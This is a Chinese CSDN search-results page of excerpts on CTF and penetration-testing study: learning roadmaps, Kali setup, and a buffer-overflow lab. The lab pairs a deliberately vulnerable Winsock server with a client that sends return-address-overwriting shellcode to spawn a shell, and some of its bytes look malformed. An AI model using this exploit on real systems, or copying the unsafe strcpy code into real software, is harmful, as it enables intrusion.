精华内容
下载资源
问答
  • 网络攻防WEB入门指南(大佬绕路)

    千次阅读 2021-03-31 16:55:38
    网络攻防WEB入门指南(大佬绕路) 文章目录前言学习网络攻防该如何入门 前言 我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者...

    网络攻防WEB入门指南(大佬绕路)


    前言

    我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。

    学习网络攻防该如何入门

    常规CTF比赛主要分为线上做题,以及线下AWD攻防(Attack With Defence),其中初赛往往为做题形式,决赛为AWD混战。做题形式又分为MISC(杂项)、PWN、WEB、REVERSE(逆向)、CRYPTO(密码),AWD混战以WEB为主,部分会有PWN,做题和AWD形式中的WEB都万变不离其宗,主要攻击手段有SQL注入、XSS、SSRF、文件包含、文件上传和一些已披露漏洞等,比赛中的漏洞又是故意暴露出来的,故比较好看出来,只要熟悉以上漏洞形式,即可上传SHELL拿FLAG。
    其中主方向有WEB、逆向、PWN三个,一般一个人只能选一个方向主要学习,因为所涉及的知识不同,也没听说过能全精的。MISC和密码带着学一些,新手没思路的话一般推荐从web入手,web入门简单,除非对二进制特别感兴趣或代码能力极强。
    一定要精通至少一门编程语言!!!不管选择学什么方面,编程语言都相当重要,CTF中不要想做脚本小子(纯只会用工具),能用工具解决的都是简单题,每个方面学到中等以后都会要求编程能力,web方面发包调试、sql注入等;杂项和密码编写解密脚本;逆向脚本动态调试、解密;PWN更不用说了,没有题是不需要写脚本的。这里推荐python3,这是目前较容易上手且非常流行的语言。

    我主学web方面,谈谈web如何入门:
    想学web,首先基础知识得了解,现代网络技术课程的内容都要掌握,什么是流量包,http协议等等基础的概念要比较清楚,这个网上很多教程,学校大二也会开设这门课。
    如果很早开始学习web,时间很多的话,可以自己摸索着搭建一个网站,对web的理解会有很大提升(这里说的搭建不是指用phpstudy一类自动化建站工具,而是包括自己写php源码,连接数据库上传等)。租一个阿里云学生服务器,便宜且好用,不仅可以搭建自己的网站,有些题目包括比赛,都会用到(如反弹别的网站shell到自己服务器)

    前期不太会编程的前提下,多用用经典常见工具,先从脚本小子做起。最常见的工具如burpsuite、wireshark、AWVS、nmap、sqlmap、御剑系列扫描工具等等。这个可以下一个i春秋或吾爱破解的工具包,或者悬剑武器库(号称中国版kali的系统),里面都是集成工具的,一个个工具熟悉。

    练习环境推荐自己利用phpstudy搭建经典的DVWA测试环境,各种漏洞类型都有,还能调整难度,实在不会搭建,buuctf网站上也有现成可以打开的容器环境。

    入门推荐书籍:
    《白帽子讲web安全》
    《web前端黑客技术揭秘》
    《python绝技:利用python成为顶级黑客》
    《kali linux 高级渗透测试》
    《从0到1 CTFer成长之路》

    (其实不用挑,市面上有关web安全的书都可以看,主要只要肯看肯学,什么书都差不多的,要将知识转换为技术,而不是在乎学到了多少内容)

    推荐几个不错的微信公众号:程序员知识星球、川云安全团队、Gamma实验室、黑白之道、红客、家国安全、Khan安全团队、渗透云笔记、悬剑武器库

    不管学什么,学主要知识的同时,多接触kali linux,黑客都在用的操作系统,功能太强大,不详细介绍(kali用的好,牢饭吃到老)。教程很多很好搜,不推荐具体的,建议安装最新的版本,新版比旧版集成工具命令更多。

    要求能力:php至少完全能看懂,包括不常用的函数功能要清楚,最好会写,可以自己搭建网站练习
    python会根据功能自己编写脚本
    linux常见指令会用
    mysql基本语句会用
    部分教程链接(仅供参考,可以自己找更好的)
    https://www.runoob.com/php/php-variables.html (php)
    https://www.liaoxuefeng.com/wiki/1016959663602400 (python3)
    https://www.runoob.com/mysql/mysql-tutorial.html (mysql)

    最后多练才是王道,多参加比赛,线上赛很多,都可以自己了解报名
    做题网站:
    https://adworld.xctf.org.cn/
    https://buuoj.cn/
    https://www.bugku.com/
    https://ctf.pediy.com/

    https://ctf.bugku.com/awd/index.html
    有时间可以在这个平台上注册一下,自己组队参加一下定期举行的AWD形式比赛,很少有平台举行AWD的比赛,CTF决赛都是AWD形式,尤其蓝帽杯之前的初赛决赛都是AWD形式,这种实操的模式更贴近实战,可以练习熟悉一下。

    https://zhongce.360.cn/sign-in
    自我感觉web学得不错,不知道入没入门的话,我推荐这个360的众测平台的考核,这个平台是用来挖真实网站漏洞提交来获取赏金的平台,但要想取得平台入驻资格必须通过他们内部组织的考试,我之前考了一下,比较容易,基本是CTF中WEB入门题。如果能通过考核,web差不多可以算入门了。

    展开全文
  • 网络攻防学习路线[菜鸟借鉴其他大佬]

    千次阅读 多人点赞 2019-12-14 11:09:49
    以下内容是本菜鸟借鉴的其他大佬的学习路线 希望大家有好的学习课程可以在评论区一起分享交流 第一周:入门 在学习的时候,你起码需要对常见的黑客术语需要掌握,了解术语的话可以去看看这里的百度文库,写的还是...

    以下内容是本菜鸟借鉴的其他大佬的学习路线
    希望大家有好的学习课程可以在评论区一起分享交流

    第一周:入门

    在学习的时候,你起码需要对常见的黑客术语需要掌握,了解术语的话可以去看看这里的百度文库,写的还是可以,对大多数的黑客术语都有过渡,而且对计算机网络原理需要有着一定的基础,所以务必要去学习一下.
    https://wenku.baidu.com/view/bd2ee7d249649b6648d747a8.html

    了解好黑客术语后,你可能就会认为,我现在是不是就能去**别人家的电脑、网站挂黑页了? No,你需要一本《精通脚本黑客》第二版《Web安全攻防宝典实战篇》,了解一些渗透技术和技巧,本人秉着黑客这门职业就是对计算机技术研究的执着,并不是去恶意攻击、破坏别人的系统就是黑客。

    好了,你看完了那些书籍之后,也应该对黑客技术和渗透技术有了大致的了解,现在最快的学习捷径就是:思与勤

    :是思考的思,需要有自己对常见漏洞的一些见解,不仅要学攻击技巧,也要在互联网学会保护自己,不要让自己的思维被现有的技术束缚住,需要自己动脑思考。

    :是多加练习,假使你看完了一两本书之后,对理论的理解已经非常的透彻,但是你个人在实战的时候就是在一种“懵”的状态下,所以,我个人推荐:边学习边实战,如若只学不练,那和纸上谈兵有什么区别呢?

    第二周:学习常见黑客和渗透工具的使用

    注意:这里绝对不是说的那些什么抓鸡啊、远控啊一些无脑软件,你觉得你用了那些软件后有什么?一丝虚荣心?还是成就感?不,你在别人大牛的眼里什么都不是,你还拿着别人玩烂了的东西到处一顿乱扫,所以你需要系统的学习,就算你说你时间不够,但是常见的工具还是要知道的,比如:Hydra、medusa、sqlmap、AWVS、Burpsuite、Beef-XSS、Metasploit、Nessus、wireshark等安全工具,这些是在安全圈和渗透圈比较知名的渗透工具与平台。

    第三周:你现在已经对渗透已经有了了解了,所以大体上算是一个勉勉强强的脚本小子吧。

    你现在可以开始学习linux了,因为我可以用一句话来问你:你见过国外的那些黑客或者网络安全工程师是用Windows的?你需要学习linux命令、linux网络编程等,VI和VIM是必须要学习的(两种神级编辑器,不需要我多说,会用的都说好)。

    熟悉完linux后,你现在可以开始学习一些编程相关的知识,因为一个黑客至少都是掌握2种或多种编程语言,你如果没有编程基础的话,我这里推荐Python这个语言。因为Python这个语言代码简短,小白是很容易理解的,比如C语言的代码写一个helloworld需要5-6行,而Python只需要1行,学完了Python后可以再去学习一下C语言或者Java,你学会了一门语言后是会有基础的,而且语言都是一通互通,所以你学完Python之后再去学C应该不会有多难了,有必要的时候你也可以编写一款自己的黑客或渗透工具。

    大约多了6-7个月之后,

    你也应该算是勉强一个初级黑客或者小黑客了,你在后期可以学习一些0day挖掘技术提升自己的技能水平,看一些安全书籍,关注安全圈动态,如:Freebuf、tools论坛、看雪论坛这些比较著名的技术论坛,然后我贴一下学习图算是指路吧!

    1年后:

    你现在可以学习一些比较著名的渗透测试系统了,这里我列举了几个:

    Kali linux Parrot OS Arch linux等较知名的一些渗透系统,有机会的话还可以研究一下对于网站和服务器安全狗、云锁等一些防护软件的绕过,现在市面上有的大多数都被安全狗屏蔽掉了,所以如果自己有充足的时间的话可以自己去研究一下,毕竟有一句话叫:闷声发大财。

    推荐学习安全书籍

    WIndows Powershell应用手册
     黑客命令行攻防实战详解
     Shellcoder编程揭秘
     高度安全环境下的渗透测试
     Windows黑客技术揭秘与攻防
     黑客调式技术揭密
     黑客反汇编揭秘(第二版)
     黑客之道:漏洞发掘的艺术
     木马技术揭秘与防御
     Coding for Penetrating .Penetration
     Exploit编写系列教程
     Exploit应用开发中文手册
     Exploit-Exercises
     Q版缓冲区溢出教程
     精通黑客编程
     杀不死的秘密-反汇编揭露黑客免杀变种技术
     挖0day
     metasploitguide
     Backtrack5从入门到精通
     Linux C编程实战
     linux黑客大曝光
     常用黑客攻防技术大全

    展开全文
  • 网络攻防学习(一)

    万次阅读 2019-04-04 09:11:50
    大佬介绍kail-linux不同版本的镜像之间的区别 下好后直接运行文件夹里的VMX文件 官方账号:root 密码:toor (只有我自己觉得这个桌面超帅的吗) 二、网络配置 网络配置我选的是NAT模式 如果刚装好的kail-linux不...

    用虚拟机安装backtrack(现在更新为kail-linux)
    一、在官网上找镜像安装
    大佬介绍kail-linux不同版本的镜像之间的区别
    我用的是这个
    下好后直接运行文件夹里的VMX文件
    官方账号:root
    密码:toor
    在这里插入图片描述
    (只有我自己觉得这个桌面超帅的吗)

    二、网络配置
    网络配置我选的是NAT模式
    如果刚装好的kail-linux不能上网的话:
    1、先看看ifconfig(命令提示框里),看看网卡有没有出错
    2、没有的话leafpad /etc/network/interfaces
    输入最下面文本的内容
    在这里插入图片描述
    重新执行一遍/etc/init.d/networking restart

    3、另外一种情况

    这是不正常的界面
    在这里插入图片描述
    这是正常的界面
    然后看看能不能将VM的网络重置一番(重置VM的网络配置

    leafpad /etc/NetworkManager/NetworkManager.conf
    

    把最后一行的managed=false改为managed=true

    三、kail其他配置
    1、对硬软件进行一番更新

    apt update&upgrade
    

    2、安装vm-tools
    在上一步的基础上apt install open-vm-tools-desktop fuse
    重启reboot

    3、软件源更新

    /etc/apt/sources.list
    

    引用一下大佬的代码

    deb http://mirrors.163.com/debian wheezy main non-free contrib 
    deb-src http://mirrors.163.com/debian wheezy main non-free contrib 
    deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib 
    deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib 
    deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib 
    deb http://mirrors.163.com/debian-security wheezy/updates main non-free contrib 
    #官方源
    #deb http://http.kali.org/kali kali main non-free contrib
    #deb-src http://http.kali.org/kali kali main non-free contrib
    #deb http://security.kali.org/kali-security kali/updates main contrib non-free
    #阿里云 Kali源 
    #deb http://mirrors.aliyun.com/kali kali main non-free contrib 
    #deb-src http://mirrors.aliyun.com/kali kali main non-free contrib 
    #deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free 
    #中科大 Kali源 
    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
    deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    #浙江大学 Kali源 
    deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 
    deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 
    #东软大学 Kali源 
    #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib 
    #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib 
    #重庆大学 Kali源 
    deb http://http.kali.org/kali kali-rolling main non-free contrib 
    deb-src http://http.kali.org/kali kali-rolling main non-free contrib 
    #官方Kali源 #
    #deb http://http.kali.org/kali kali-rolling main non-free contrib 
    #deb-src http://http.kali.org/kali kali-rolling main non-free contrib
    --------------------- 
    作者:FreeMing-imduingui0 
    原文:https://blog.csdn.net/qq_20881087/article/details/85257400 
    

    (如果没有安装vm-tools的话只能一个一个的敲上去了)

    4、安装汉语输入法

    辅助安装软件工具,直接可以图形化安装 deb 的安装包。
    安装 : apt-get install gdebi

    在网络上搜索搜狗linux,找到下载文件之后

    sudo gdebi sogoupinyin_2.1.0.0086_amd64.deb
    

    整个过程还是没有什么波折的,官方系统又帅又好用哈哈哈哈哈

    展开全文
  • 网络攻防实验之缓冲区溢出攻击

    千次阅读 2019-07-09 22:10:07
    这个实验是网络攻防课程实验中的一个,但是目前我还没有完全搞懂代码,以后有机会来补。也欢迎大佬指点 一、实验目的和要求 通过实验掌握缓冲区溢出的原理,通过使用缓冲区溢出攻击软件模拟入侵远程主机理解...

    这个实验是网络攻防课程实验中的一个,但是目前我还没有完全搞懂代码,以后有机会来补。也欢迎大佬指点

    一、实验目的和要求

          通过实验掌握缓冲区溢出的原理,通过使用缓冲区溢出攻击软件模拟入侵远程主机理解缓冲区溢出危害性,并理解防范和避免缓冲区溢出攻击的措施。

    二、实验原理和实验环境

    实验原理:

            缓冲区溢出(Buffer Overflow)是目前非常普遍而且危险性非常高的漏洞,在各种操作系统和应用软件中广泛存在。利用缓冲区溢出攻击,可以使远程主机出现程序运行错误、系统死机或者重启等异常现象,它甚至可以被黑客利用,在没有任何系统帐户的条件下获得系统最高控制权,进而进行各种非法操作。

           缓冲区溢出的原理很简单,类似于把水倒入杯子中,而杯子容量有限,如果倒入水的量超过杯子的容量,水就会溢出来。缓冲区是一块用于存放数据的临时内存空间,它的长度事先已经被程序或者操作系统定义好。缓冲区类似于一个杯子,写入的数据类似于倒入的水。缓冲区溢出就是将长度超过缓冲区大小的数据写入程序的缓冲区,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其他指令。

    例如:

    #include <stdio.h>

    main()

    {

    char string[8];

    gets(string);

    printf("string is %s\n", string);

    }

           在UNIX系统中对C函数处理时,系统会为其分配一段内存区间,其中用于函数调用的区域为堆栈区,保存了函数调用过程中的返回地址、栈顶和栈底信息,以及局部变量和函数的参数。上述main函数执行时,上述信息按照参数、ret(返回地址)和EBP(栈底)的顺序依次压入其堆栈区中,然后根据所调用的局部变量再在堆栈中开辟一块相应的空间,这个内存空间被申请占用的过程是从内存高地址空间向低地址空间的延伸。为局部变量在堆栈中预留的空间在填入局部变量时,其填入的顺序是从低地址内存空间向高地址内存空间依次进行。函数执行完后,局部变量占用的内存空间将被丢弃,并根据EBP和ret地址,恢复到调用函数原有地址空间继续执行。当字符处理函数没有对局部变量进行越界监视和限制时,就存在局部变量写越界,覆盖了高地址内存空间中ret、EBP的信息,造成缓冲区溢出。

            对于上述main()函数,由于没有参数,系统首先将main函数的ret和EBP写入堆栈,然后根据string[8]字符数组的大小,堆栈再扩展8个字节的空间用于存放sting[]数组中的局部变量。当执行gets()函数将局部变量例如AAAA写入string[]数组时,字符串AAAA会先填入内存的低地址空间,如下图所示,然后再是高地址空间。堆栈中内存的分配以4字节为单位,如果gets()函数执行时输入的字符串为AAAAAAAAAAAAAAAA,按照上述填入顺序,原有ret和EBP的内存空间将会被字符串A覆盖。

           当main函数返回时,再从原ret处获取调用函数返回地址时,就会把AAAA对应的十六进制ASCII码0x41414141作为返回地址,使CPU试图执行0x41414141处的指令,由于0x41414141不是一个正常的内存空间地址,就会发生缓冲区溢出。发生溢出时,如果用一个实际存在的指令地址来覆盖被调用函数的返回地址,则系统就会转而执行这个指令,这一点就是缓冲区溢出被用来进行攻击的最关键之处。在UNIX系统中,由于相同shell环境下,程序的堆栈地址信息是相同的,所以只要调试后找到这个堆栈地址,就可以在发生溢出时转而执行这个事先设定的程序了。并且,如果发生溢出的源程序具有管理员权限,则替换后的程序也拥有相同的管理员权限。

          引起缓冲区溢出的问题主要原因是C和C++本质就是不安全的(Java和C#就相对安全许多)没有边界来检查数据和指针的引用。而软件开发人员经常忽略检查边界,这就会有缓冲区溢出的风险。标准C库中还存在许多非安全字符串的操作,包括strcpy()、sprintf()、gets()、strcat、scanf、vscanf等。为了防止缓冲区溢出的发生,编程人员需要对这些存在缓冲区溢出问题的函数予以关注,增加边界限制,编写正确的代码,或者改用没有问题的函数,例如strncpy()、strncat()、snprintf()等。

    实验环境:

        Windows XP,VC 6.0

    三、实验内容及步骤 

    1、打开控制台。

          学生单击“试验环境试验”进入实验场景,单击L005001001xp01_1中的“打开控制台”按钮,进入目标主机。

    2、找到桌面上的Microsoft Visual C++ 6.0,双击打开。

    3新建一个C++ Source File,文件名为server,作为服务器。

    4、Dtools文件夹下打开server文件,将里面的代码复制到建立的C++文件中。并编译构建。

    #include <stdio.h>
    
    #include <stdlib.h>
    
    #include <WINSOCK2.H>
    
    #pragma comment (lib, "WS2_32")
    
    void showcontent(char *buff);
    
    int main(int argc, char **argv)
    
    {
    
           WSADATA wsaData;
    
           if( WSAStartup(0x101, &wsaData) != 0 )
    
           {
    
       printf("Failed Initialization.\n");
    
       return 0;
    
           }
    
          
    
           if(argc!=2)
    
           {
    
       printf("Usage: server.exe [port]\n");
    
       return 0;
    
           }
    
          
    
           int port = atoi(argv[1]);
    
           SOCKET sListen = ::socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
           if (sListen == INVALID_SOCKET)
    
           {
    
       printf("Failed socket()\n");
    
       return 0;
    
           }
    
           sockaddr_in sin;
    
           sin.sin_family = AF_INET;
    
           sin.sin_port = htons(port);
    
           sin.sin_addr.S_un.S_addr = INADDR_ANY;
    
           if (::bind(sListen, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)
    
           {
    
       printf("Failed bind()\n");
    
       return 0;
    
           }
    
           if (::listen(sListen, 2) == SOCKET_ERROR)
    
           {
    
       printf("Failed listen()\n");
    
       return 0;
    
           }
    
           sockaddr_in remoteAddr;
    
           int nAddrLen = sizeof(remoteAddr);
    
           SOCKET sClient;
    
           char szText[] = "TCP Server is Connected!\n\n";
    
           char buff[1024] = {0};
    
           char toSend[1024] = {0};
    
           while (TRUE)
    
           {
    
       sClient = ::accept(sListen, (SOCKADDR*)&remoteAddr, &nAddrLen);
    
       if (sClient == INVALID_SOCKET)
    
       {
    
              printf("Failed accept()\n");
    
              continue;
    
       }
    
       printf("Somebody is connecting: %s\n", inet_ntoa(remoteAddr.sin_addr));
    
       ::send(sClient, szText, strlen(szText), 0);
    
       int nRecv = ::recv(sClient, buff, sizeof(buff), 0);
    
       if (nRecv > 0)
    
       {
    
              buff[nRecv] = '\0';
    
              ::closesocket(sClient);
    
              break;
    
       }
    
           }
    
           ::closesocket(sListen);
    
           showcontent(buff);
    
           return 0;
    
    }
    
    void showcontent(char *buff)
    
    {
    
           char content[8];
    
           strcpy(content, buff);
    
           printf("%s", content);
    
    }

    5、运行程序,可以看见有server.exe应用程序,[port]是口令。

    6、再新建一个C++ Source File,文件名为Client,作为客户端。

     

    7、在D盘tools文件夹下的client文件,复制其中的代码到c++文件中,编译构建。

    #include <stdio.h> 
    
    #include <stdlib.h>
    
    #include <WINSOCK2.H>
    
    #pragma comment (lib, "WS2_32")
    
    int main(int argc, char* *argv)
    
    {
    
           WSADATA wsaData;
    
           if( WSAStartup(0x101, &wsaData) != 0 )
    
           {
    
       printf("Failed Initialization.\n");
    
       return 0;
    
           }
    
                 if(argc!=3)
    
           {
    
       printf("Usage: client.exe [Server_IP] [port]\n");
    
       return 0;
    
           }
    
           int port = atoi(argv[2]);
    
           SOCKET s = ::socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
          
    
           if(s == INVALID_SOCKET)
    
           {
    
       printf("Failed socket()\n");
    
       return 0;
    
           }
    
           sockaddr_in servAddr;
    
           servAddr.sin_family = AF_INET;
    
           servAddr.sin_port = htons(port);
    
           servAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
    
           if(::connect(s, (sockaddr *)&servAddr, sizeof(servAddr)) == -1)
    
           {
    
       printf("Failed connect()\n");
    
       return 0;
    
           }
    
           char buff[1024];
    
           int nRev = ::recv(s, buff, sizeof(buff), 0);
    
           if (nRev > 0)
    
           {
    
       buff[nRev] = '\0';
    
       printf("Received: %s", buff);
    
           }
    
           char toSend[] =
    
       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    
       "\x12\x45\xfa\x7f"
    
       "\x55\x8b\xec"
    
       "\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\xc6\x45\xf5\x53\xc6\x45"
    
       "\xf6\x56\xc6\x45\xf7\x43\xc6\x45\xf8\x52\xc6\x45\xf9\x54\xc6"
    
       "\x45\xfa\x2e\xc6\x45\xfb\x44\xc6\x45\xfc\x4c\xc6"
    
       "\x45\xfd\x4c\xba"
    
       "\x80\x1d\x80\x7c"   //loadlibrarya
    
       "\x52\x8d\x45\xf4\x50\xf"
    
       "\xff\xd0";
    
          
    
     char toSend2[] =
    
             "\x41\x42\x43\x44"
    
       "\x45\x46\x47\x48"
    
       "\x12\x45\xfa\x7f"
    
       "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
    
       "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
    
       "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
    
       "\x9c\x3f\x88\x7c"   //loadlibrary地址0x7c883f9c
    
       "\x52\x8D\x45\xF4\x50"
    
       "\xFF\x55\xF0"
    
       "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
    
       //command.
    
       "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
    
       //      c   o   m
    
       "\x50\xB8"
    
       "\x7c\xbf\x93\x77"   //System地址0x77bf93c7
    
       "\xFF\xD0";
    
          
    
           send(s, toSend, strlen(toSend), 0);
    
           ::closesocket(s);
    
           return 0;
    
    }

    8、运行程序,可以看见有client.exe应用程序,[Server_IP]是服务器的IP地址,[port]是口令。

    9、打开命令提示符,输入“ipconfig”查看本机的IP地址,即为服务器的IP地址。这里的IP地址是172.16.1.186

    10、打开桌面上的Debug文件夹,找到其中的client.exe和server.exe。

    11、复制server.exe和client.exe,将他们粘贴到“c:\windows\system32”目录下。

    12、打开命令提示符,找到“c:\windows\system32”目录,并运行命令“server.exe 8888”来开启server。

    开始文件夹是隐藏的,点击“显示此文件夹内容”

    13、另外打开一个命令提示符,同样找到“c:\windows\system32”目录,运行命令

    “client.exe 172.16.1.186 8888”来攻击server。

    14、点击回车键后,可以看见一行提示“Received: TCP Server is Connected!”,

    表明连接上了server。然后会弹出一个对话框,显示server.exe遇到问题需要关闭,这表明server被攻击并报错了。

    展开全文
  • 先说一哈 其实这个 恶意程序 大...so 还请大佬们绕道了== 先说一下程序的大概情况=== 其实 程序外表就是一个扫雷的辅助工具== 具体的原理可以参考 https://blog.csdn.net/qq_41071646/article/details/8492...
  • 我们知道在lT这种行业,只要有技术,你就是大佬。技术上的好与坏,无非就是不断的学习,在学习这件事上,男女都一样,只要你肯努力学,找到正确的方向,都是会有结果的。其实,大多数女生犹豫学不学IT的主要原因不是...
  • 首先来谈谈网络安全就业方面 由于我国网络安全起步晚,所以现在网络安全工程师十分紧缺。根据职友集的数据显示,当前市场上需求量较大的几类网络安全岗位,如安全运维、渗透测试、等保测评等,平均薪资水平都在10k...
  • 题目连接 http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php ...第五题 第六题 第七题 2
  • 1.key在哪里? 分值: 100 过关地址 emmmm,一进网页就告诉我key在其中,好似生怕我找不到一样; 2.再加密一次你就得到key...看到这个题确实有点看不懂,不知道是什么加密,看了大佬答案才知道是rot 13,字符串用r...
  • 攻防世界MISC进阶之Avatar第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数:2星 题目来源: su-ctf-quals-2014 题目描述:一个恐怖份子上传了这张照片到社交网络。里面藏了什么信息? 文件下载之后,...
  • 安全界行业大佬推荐

    2019-09-25 17:23:26
    e安在线 关注「e安在线」一站了解等级保护2.0、工业互联网安全,给你看得见的职业成长! 我们致力于等级保护、工业互联网安全人才的培养,...同时为行业用户提供网络安全实训平台和攻防竞技平台,提供全面而...
  • 攻防世界 web weak_auth 奶妈详解 本人小白,刚刚步入ctf的世界,借这个平台写点东西来提升自己水平,咳咳有啥缺陷还请大佬指正。哈哈哈,我甚至连博客编辑都没搞明白。废话不多就上题吧。 当然,首先看到题目可以...
  • 免责声明:本公众号发布的文章均...欢迎各位添加微信号:qinchang_198231 加入安全+ 交流群 和大佬们一起交流安全技术作者介绍:杨秀璋自幼受贵州大山的熏陶,养成了诚实质朴的性格。经过寒窗苦读,考入BIT,为完成...
  • 网络攻防之CTF篇

    2020-11-13 13:04:05
    这是第一次写CSDN文章,平时主要是以学习别人的文章为主,作为一个编程和ctf的入门选手,水平肯定比较一般,写出来的目的就是加深自己的记忆,同时能够给别人提供一个不一样的思路吧(大佬除外)!废话不多说,现在...
  • 点击上方“逆锋起笔”,公众号回复pdf领取大佬们推荐的学习资料吴涛、方嘉明、吴荣德、徐焱编著在网络安全领域,是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,...
  • 第一题:js 混淆 - 源码乱码1、前言2、题目理解3、逆向(踩坑)分析过程3.1、初步分析3.2、当头一棒3.3、循序渐进3.4、大功告成4、结语 1、前言 接触网络爬虫已经有两三年...恰巧最近关注的爬虫大佬王平办了个爬虫攻防
  • 网络安全入门

    2020-01-02 18:06:53
    版权声明:本文为CSDN博主「greedy-hat」的原创文章,遵循 CC 4.0 BY-SA 版权...书籍推荐《黑客攻防从入门到精通》,先借助大佬整理的知识脉络,等我真正入门之后再总结自己的心得: 网络安全入门基本知识 网络...
  • 网络攻防?一句话木马总结 我为什么选了这个专业 我现在是一名大三的学生,普普通通特长不多,拿过一些奖,拿过一些奖学金,之前也是为了我的就业方向焦头烂额,不过,最终我决定了往网络空间安全方向发展,实在要说...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 我们大多数人平常使用最多的电脑操作系统就是Windows操作系统,比如Windows XP、Windows 7、...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 我们大多数人平常使用最多的电脑操作系统就是Windows操作系统,比如Windows XP、Windows 7、...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 我们大多数人平常使用最多的电脑操作系统就是Windows操作系统,比如Windows XP、Windows 7、...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 我们大多数人平常使用最多的电脑操作系统就是Windows操作系统,比如Windows XP、Windows 7、...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 我们大多数人平常使用最多的电脑操作系统就是Windows操作系统,比如Windows XP、Windows 7、...
  • 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 我们大多数人平常使用最多的电脑操作系统就是Windows操作系统,比如Windows XP、Windows 7、...
  • 此次攻防世界上的高校战“疫”网络安全分享赛有幸分享了一道题目。水平还很菜但是这次经历也对我自我激励也起到了很好的作用。本来想出一道pwn题的但是进了出题群后,乖乖面向大佬自闭,修改题目。。QAQ。 题目说明 ...
  • 有幸参加了这次线下awd模式的攻防赛,记录一下。自己参加过两次这种比赛,第一次是安徽省的蓝盾杯,当时比赛开始时一脸懵逼,不知道线下赛有如何的套路。被大佬们吊打了一路,扫出来端口却不知道可能存在的漏洞,...
  • 2020-03-01

    2020-03-01 09:40:40
    论文要写网络攻防教学平台,主要是将实验融入到平台,让用户可以进行模拟实验操作,但是怎样把实验和平台融合呢?计算机中的网络白痴,求大佬指点。 ...
  • 2020-07-19

    2020-07-19 23:14:10
    问各位大佬一个问题,我对网络攻防比较感兴趣,同时对硬件开发,类似于嵌入式开发,就是编程然后操作机器或者自己用零件做一些实体的东西的也比较感兴趣,我现在是网络工程专业,我该怎么选择以后的就业方向,本人...
  • 攻防实验

    2019-10-01 08:59:18
    今天公司里安排要回学校为刚搭建好的工业网络做一次攻防实验 很迷,去之前我们其实连到底要干嘛,要做什么都不知道,就傻不拉几的跑了过去 到那边后才知道他们环境都搭建好了,就等着我们开始下一步的攻防实验了, ...

空空如也

空空如也

1 2
收藏数 39
精华内容 15
关键字:

网络攻防大佬